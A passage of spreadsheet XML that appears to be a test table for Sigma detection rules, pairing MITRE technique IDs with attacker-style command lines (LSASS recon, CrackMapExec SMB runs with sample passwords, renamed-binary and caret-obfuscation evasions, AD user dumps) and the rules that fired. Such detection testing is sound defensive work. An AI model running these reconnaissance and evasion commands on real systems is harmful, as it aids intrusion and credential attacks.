      <c r="E1644" s="43" t="inlineStr">
        <is>
          <t>Seatbelt.exe -group=\"user\" InterestingProcesses</t>
        </is>
      </c>
      <c r="F1644" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1644" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1644" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1644" s="43" t="n"/>
      <c r="J1644" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1644" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1645" ht="15.75" customHeight="1" s="42">
      <c r="A1645" s="43" t="inlineStr">
        <is>
          <t>t1614.001</t>
        </is>
      </c>
      <c r="B1645" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_lookup</t>
        </is>
      </c>
      <c r="C1645" s="43" t="inlineStr">
        <is>
          <t>Console CodePage Lookup Via CHCP</t>
        </is>
      </c>
      <c r="D1645" s="43" t="inlineStr">
        <is>
          <t>7090adee-82e2-4269-bd59-80691e7c6338</t>
        </is>
      </c>
      <c r="E1645" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "chcp   "</t>
        </is>
      </c>
      <c r="F1645" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1645" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1645" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1645" s="43" t="inlineStr">
        <is>
          <t>Console CodePage Lookup Via CHCP (7090adee-82e2-4269-bd59-80691e7c6338); Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J1645" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1645" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1646" ht="15.75" customHeight="1" s="42">
      <c r="A1646" s="43" t="inlineStr">
        <is>
          <t>t1614.001</t>
        </is>
      </c>
      <c r="B1646" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_lookup</t>
        </is>
      </c>
      <c r="C1646" s="43" t="inlineStr">
        <is>
          <t>Console CodePage Lookup Via CHCP</t>
        </is>
      </c>
      <c r="D1646" s="43" t="inlineStr">
        <is>
          <t>7090adee-82e2-4269-bd59-80691e7c6338</t>
        </is>
      </c>
      <c r="E1646" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy chcp.com bypass.exe &amp;&amp; bypass.exe"</t>
        </is>
      </c>
      <c r="F1646" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1646" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1646" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1646" s="43" t="inlineStr">
        <is>
          <t>Console CodePage Lookup Via CHCP (7090adee-82e2-4269-bd59-80691e7c6338); Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892)</t>
        </is>
      </c>
      <c r="J1646" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1646" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1647" ht="15.75" customHeight="1" s="42">
      <c r="A1647" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1647" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_discovery_via_reg_queries</t>
        </is>
      </c>
      <c r="C1647" s="43" t="inlineStr">
        <is>
          <t>System Information Discovery via Registry Queries</t>
        </is>
      </c>
      <c r="D1647" s="43" t="inlineStr">
        <is>
          <t>0022869c-49f7-4ff2-ba03-85ac42ddac58</t>
        </is>
      </c>
      <c r="E1647" s="43" t="inlineStr">
        <is>
          <t>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v CurrentBuildNumber</t>
        </is>
      </c>
      <c r="F1647" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1647" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1647" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1647" s="43" t="inlineStr">
        <is>
          <t>System Information Discovery via Registry Queries (0022869c-49f7-4ff2-ba03-85ac42ddac58)</t>
        </is>
      </c>
      <c r="J1647" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1647" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1648" ht="15.75" customHeight="1" s="42">
      <c r="A1648" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1648" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_discovery_via_reg_queries</t>
        </is>
      </c>
      <c r="C1648" s="43" t="inlineStr">
        <is>
          <t>System Information Discovery via Registry Queries</t>
        </is>
      </c>
      <c r="D1648" s="43" t="inlineStr">
        <is>
          <t>0022869c-49f7-4ff2-ba03-85ac42ddac58</t>
        </is>
      </c>
      <c r="E1648" s="43" t="inlineStr">
        <is>
          <t>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName</t>
        </is>
      </c>
      <c r="F1648" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1648" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1648" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1648" s="43" t="inlineStr">
        <is>
          <t>System Information Discovery via Registry Queries (0022869c-49f7-4ff2-ba03-85ac42ddac58)</t>
        </is>
      </c>
      <c r="J1648" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1648" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1649" ht="15.75" customHeight="1" s="42">
      <c r="A1649" s="43" t="inlineStr">
        <is>
          <t>t1057</t>
        </is>
      </c>
      <c r="B1649" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_pipe_output</t>
        </is>
      </c>
      <c r="C1649" s="43" t="inlineStr">
        <is>
          <t>Recon Command Output Piped To Findstr.EXE</t>
        </is>
      </c>
      <c r="D1649" s="43" t="inlineStr">
        <is>
          <t>ccb5742c-c248-4982-8c5c-5571b9275ad3</t>
        </is>
      </c>
      <c r="E1649" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c tasklist | findstr lsass</t>
        </is>
      </c>
      <c r="F1649" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1649" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1649" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1649" s="43" t="inlineStr">
        <is>
          <t>LSASS Process Reconnaissance Via Findstr.EXE (fe63010f-8823-4864-a96b-a7b4a0f7b929); LSASS Process Reconnaissance Via Findstr.EXE (fe63010f-8823-4864-a96b-a7b4a0f7b929)</t>
        </is>
      </c>
      <c r="J1649" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1649" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1650" ht="15.75" customHeight="1" s="42">
      <c r="A1650" s="43" t="inlineStr">
        <is>
          <t>t1120</t>
        </is>
      </c>
      <c r="B1650" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_drive_enumeration</t>
        </is>
      </c>
      <c r="C1650" s="43" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration</t>
        </is>
      </c>
      <c r="D1650" s="43" t="inlineStr">
        <is>
          <t>63de06b9-a385-40b5-8b32-73f2b9ef84b6</t>
        </is>
      </c>
      <c r="E1650" s="43" t="inlineStr">
        <is>
          <t>fsutil fsinfo drives</t>
        </is>
      </c>
      <c r="F1650" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1650" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1650" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1650" s="43" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration (63de06b9-a385-40b5-8b32-73f2b9ef84b6)</t>
        </is>
      </c>
      <c r="J1650" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1650" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1651" ht="15.75" customHeight="1" s="42">
      <c r="A1651" s="43" t="inlineStr">
        <is>
          <t>t1120</t>
        </is>
      </c>
      <c r="B1651" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_drive_enumeration</t>
        </is>
      </c>
      <c r="C1651" s="43" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration</t>
        </is>
      </c>
      <c r="D1651" s="43" t="inlineStr">
        <is>
          <t>63de06b9-a385-40b5-8b32-73f2b9ef84b6</t>
        </is>
      </c>
      <c r="E1651" s="43" t="inlineStr">
        <is>
          <t>fsutil  fsinfo  drives</t>
        </is>
      </c>
      <c r="F1651" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1651" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1651" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1651" s="43" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration (63de06b9-a385-40b5-8b32-73f2b9ef84b6)</t>
        </is>
      </c>
      <c r="J1651" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1651" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1652" ht="15.75" customHeight="1" s="42">
      <c r="A1652" s="43" t="inlineStr">
        <is>
          <t>t1120</t>
        </is>
      </c>
      <c r="B1652" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_drive_enumeration</t>
        </is>
      </c>
      <c r="C1652" s="43" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration</t>
        </is>
      </c>
      <c r="D1652" s="43" t="inlineStr">
        <is>
          <t>63de06b9-a385-40b5-8b32-73f2b9ef84b6</t>
        </is>
      </c>
      <c r="E1652" s="43" t="inlineStr">
        <is>
          <t>fsutil" fsinfo drives</t>
        </is>
      </c>
      <c r="F1652" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1652" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1652" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1652" s="43" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration (63de06b9-a385-40b5-8b32-73f2b9ef84b6)</t>
        </is>
      </c>
      <c r="J1652" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1652" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1653" ht="15.75" customHeight="1" s="42">
      <c r="A1653" s="43" t="inlineStr">
        <is>
          <t>t1120</t>
        </is>
      </c>
      <c r="B1653" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_drive_enumeration</t>
        </is>
      </c>
      <c r="C1653" s="43" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration</t>
        </is>
      </c>
      <c r="D1653" s="43" t="inlineStr">
        <is>
          <t>63de06b9-a385-40b5-8b32-73f2b9ef84b6</t>
        </is>
      </c>
      <c r="E1653" s="43" t="inlineStr">
        <is>
          <t>copy fsutil.exe not_fsutil.exe &amp;&amp; not_fsutil.exe fsinfo drives</t>
        </is>
      </c>
      <c r="F1653" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1653" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1653" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1653" s="43" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration (63de06b9-a385-40b5-8b32-73f2b9ef84b6)</t>
        </is>
      </c>
      <c r="J1653" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1653" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1654" ht="15.75" customHeight="1" s="42">
      <c r="A1654" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1654" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gpresult_execution</t>
        </is>
      </c>
      <c r="C1654" s="43" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information</t>
        </is>
      </c>
      <c r="D1654" s="43" t="inlineStr">
        <is>
          <t>e56d3073-83ff-4021-90fe-c658e0709e72</t>
        </is>
      </c>
      <c r="E1654" s="43" t="inlineStr">
        <is>
          <t>gpresult.exe /z</t>
        </is>
      </c>
      <c r="F1654" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1654" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1654" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1654" s="43" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information (e56d3073-83ff-4021-90fe-c658e0709e72)</t>
        </is>
      </c>
      <c r="J1654" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1654" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1655" ht="15.75" customHeight="1" s="42">
      <c r="A1655" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1655" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gpresult_execution</t>
        </is>
      </c>
      <c r="C1655" s="43" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information</t>
        </is>
      </c>
      <c r="D1655" s="43" t="inlineStr">
        <is>
          <t>e56d3073-83ff-4021-90fe-c658e0709e72</t>
        </is>
      </c>
      <c r="E1655" s="43" t="inlineStr">
        <is>
          <t>gpresult /V</t>
        </is>
      </c>
      <c r="F1655" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1655" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1655" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1655" s="43" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information (e56d3073-83ff-4021-90fe-c658e0709e72)</t>
        </is>
      </c>
      <c r="J1655" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1655" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1656" ht="15.75" customHeight="1" s="42">
      <c r="A1656" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1656" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gpresult_execution</t>
        </is>
      </c>
      <c r="C1656" s="43" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information</t>
        </is>
      </c>
      <c r="D1656" s="43" t="inlineStr">
        <is>
          <t>e56d3073-83ff-4021-90fe-c658e0709e72</t>
        </is>
      </c>
      <c r="E1656" s="43" t="inlineStr">
        <is>
          <t>gpresult /z /r</t>
        </is>
      </c>
      <c r="F1656" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1656" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1656" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1656" s="43" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information (e56d3073-83ff-4021-90fe-c658e0709e72)</t>
        </is>
      </c>
      <c r="J1656" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1656" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1657" ht="15.75" customHeight="1" s="42">
      <c r="A1657" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1657" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C1657" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D1657" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E1657" s="43" t="inlineStr">
        <is>
          <t>cme.exe smb 192.168.1.100 --local-auth --username Administrator --password "P@ssw0rd123!" -x whoami</t>
        </is>
      </c>
      <c r="F1657" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1657" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1657" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1657" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J1657" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1657" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1658" ht="15.75" customHeight="1" s="42">
      <c r="A1658" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1658" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C1658" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D1658" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E1658" s="43" t="inlineStr">
        <is>
          <t>cme.exe</t>
        </is>
      </c>
      <c r="F1658" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1658" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1658" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1658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658" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1658" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1659" ht="15.75" customHeight="1" s="42">
      <c r="A1659" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1659" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C1659" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D1659" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E1659" s="43" t="inlineStr">
        <is>
          <t>cme smb 172.16.10.5/24 -u 'user' -p 'pass' --local-auth</t>
        </is>
      </c>
      <c r="F1659" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1659" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1659" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1659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659" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1659" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1660" ht="15.75" customHeight="1" s="42">
      <c r="A1660" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1660" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C1660" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D1660" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E1660" s="43" t="inlineStr">
        <is>
          <t>cme.exe smb 192.168.1.0/24 -u"Administrator" -p"Password123!" --local-auth -x"whoami"</t>
        </is>
      </c>
      <c r="F1660" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1660" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1660" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1660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660" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1660" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1661" ht="15.75" customHeight="1" s="42">
      <c r="A1661" s="43" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B1661" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_computer_discovery_get_adcomputer</t>
        </is>
      </c>
      <c r="C1661" s="43" t="inlineStr">
        <is>
          <t>Computer Discovery And Export Via Get-ADComputer Cmdlet</t>
        </is>
      </c>
      <c r="D1661" s="43" t="inlineStr">
        <is>
          <t>435e10e4-992a-4281-96f3-38b11106adde</t>
        </is>
      </c>
      <c r="E1661" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ADComputer -Filter * | Se`lect-Object * | Out-File computers.txt"</t>
        </is>
      </c>
      <c r="F1661" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1661" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1661" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1661" s="43" t="inlineStr">
        <is>
          <t>Computer Discovery And Export Via Get-ADComputer Cmdlet (435e10e4-992a-4281-96f3-38b11106adde)</t>
        </is>
      </c>
      <c r="J1661" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1661" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1662" ht="15.75" customHeight="1" s="42">
      <c r="A1662" s="43" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B1662" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_computer_discovery_get_adcomputer</t>
        </is>
      </c>
      <c r="C1662" s="43" t="inlineStr">
        <is>
          <t>Computer Discovery And Export Via Get-ADComputer Cmdlet</t>
        </is>
      </c>
      <c r="D1662" s="43" t="inlineStr">
        <is>
          <t>435e10e4-992a-4281-96f3-38b11106adde</t>
        </is>
      </c>
      <c r="E1662" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ADComputer -Filter * | Out-File -FilePath computers.txt"</t>
        </is>
      </c>
      <c r="F1662" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1662" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1662" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1662" s="43" t="inlineStr">
        <is>
          <t>Computer Discovery And Export Via Get-ADComputer Cmdlet (435e10e4-992a-4281-96f3-38b11106adde)</t>
        </is>
      </c>
      <c r="J1662" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1662" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1663" ht="15.75" customHeight="1" s="42">
      <c r="A1663" s="43" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B1663" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_user_discovery_get_aduser</t>
        </is>
      </c>
      <c r="C1663" s="43" t="inlineStr">
        <is>
          <t>User Discovery And Export Via Get-ADUser Cmdlet</t>
        </is>
      </c>
      <c r="D1663" s="43" t="inlineStr">
        <is>
          <t>1114e048-b69c-4f41-bc20-657245ae6e3f</t>
        </is>
      </c>
      <c r="E1663" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ADUser -Filter * | Select-Object Name,Enabled | Out-File C:\temp\users.txt"</t>
        </is>
      </c>
      <c r="F1663" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1663" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1663" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1663" s="43" t="inlineStr">
        <is>
          <t>User Discovery And Export Via Get-ADUser Cmdlet (1114e048-b69c-4f41-bc20-657245ae6e3f)</t>
        </is>
      </c>
      <c r="J1663" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1663" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1664" ht="15.75" customHeight="1" s="42">
      <c r="A1664" s="43" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B1664" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_user_discovery_get_aduser</t>
        </is>
      </c>
      <c r="C1664" s="43" t="inlineStr">
        <is>
          <t>User Discovery And Export Via Get-ADUser Cmdlet</t>
        </is>
      </c>
      <c r="D1664" s="43" t="inlineStr">
        <is>
          <t>1114e048-b69c-4f41-bc20-657245ae6e3f</t>
        </is>
      </c>
      <c r="E1664" s="43" t="inlineStr">
        <is>
          <t>pwsh.exe -c "Get-ADUser -f * | Out-String | Set-Content -Path users.txt"</t>
        </is>
      </c>
      <c r="F1664" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1664" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1664" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1664" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180); User Discovery And Export Via Get-ADUser Cmdlet (1114e048-b69c-4f41-bc20-657245ae6e3f)</t>
        </is>
      </c>
      <c r="J1664" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1664" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1665" ht="15.75" customHeight="1" s="42">
      <c r="A1665" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1665" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_view_share_and_sessions_enum</t>
        </is>
      </c>
      <c r="C1665" s="43" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE</t>
        </is>
      </c>
      <c r="D1665" s="43" t="inlineStr">
        <is>
          <t>62510e69-616b-4078-b371-847da438cc03</t>
        </is>
      </c>
      <c r="E1665" s="43" t="inlineStr">
        <is>
          <t>net view</t>
        </is>
      </c>
      <c r="F1665" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1665" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1665" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1665" s="43" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE (f117933c-980c-4f78-b384-e3d838111165)</t>
        </is>
      </c>
      <c r="J1665" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1665" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1666" ht="15.75" customHeight="1" s="42">
      <c r="A1666" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1666" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_view_share_and_sessions_enum</t>
        </is>
      </c>
      <c r="C1666" s="43" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE</t>
        </is>
      </c>
      <c r="D1666" s="43" t="inlineStr">
        <is>
          <t>62510e69-616b-4078-b371-847da438cc03</t>
        </is>
      </c>
      <c r="E1666" s="43" t="inlineStr">
        <is>
          <t>net view /d</t>
        </is>
      </c>
      <c r="F1666" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1666" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1666" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1666" s="43" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE (62510e69-616b-4078-b371-847da438cc03); Share And Session Enumeration Using Net.EXE (62510e69-616b-4078-b371-847da438cc03)</t>
        </is>
      </c>
      <c r="J1666" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1666" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1667" ht="15.75" customHeight="1" s="42">
      <c r="A1667" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1667" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_view_share_and_sessions_enum</t>
        </is>
      </c>
      <c r="C1667" s="43" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE</t>
        </is>
      </c>
      <c r="D1667" s="43" t="inlineStr">
        <is>
          <t>62510e69-616b-4078-b371-847da438cc03</t>
        </is>
      </c>
      <c r="E1667" s="43" t="inlineStr">
        <is>
          <t>net view \\127.0.0.1</t>
        </is>
      </c>
      <c r="F1667" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1667" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1667" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1667" s="43" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE (62510e69-616b-4078-b371-847da438cc03)</t>
        </is>
      </c>
      <c r="J1667" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1667" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1668" ht="15.75" customHeight="1" s="42">
      <c r="A1668" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1668" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_view_share_and_sessions_enum</t>
        </is>
      </c>
      <c r="C1668" s="43" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE</t>
        </is>
      </c>
      <c r="D1668" s="43" t="inlineStr">
        <is>
          <t>62510e69-616b-4078-b371-847da438cc03</t>
        </is>
      </c>
      <c r="E1668" s="43" t="inlineStr">
        <is>
          <t>net view ^v^i^e^w</t>
        </is>
      </c>
      <c r="F1668" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1668" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1668" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1668" s="43" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE (62510e69-616b-4078-b371-847da438cc03)</t>
        </is>
      </c>
      <c r="J1668" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1668" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1669" ht="15.75" customHeight="1" s="42">
      <c r="A1669" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1669" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_view_share_and_sessions_enum</t>
        </is>
      </c>
      <c r="C1669" s="43" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE</t>
        </is>
      </c>
      <c r="D1669" s="43" t="inlineStr">
        <is>
          <t>62510e69-616b-4078-b371-847da438cc03</t>
        </is>
      </c>
      <c r="E1669" s="43" t="inlineStr">
        <is>
          <t>net view --all</t>
        </is>
      </c>
      <c r="F1669" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1669" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1669" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1669" s="43" t="inlineStr">
        <is>
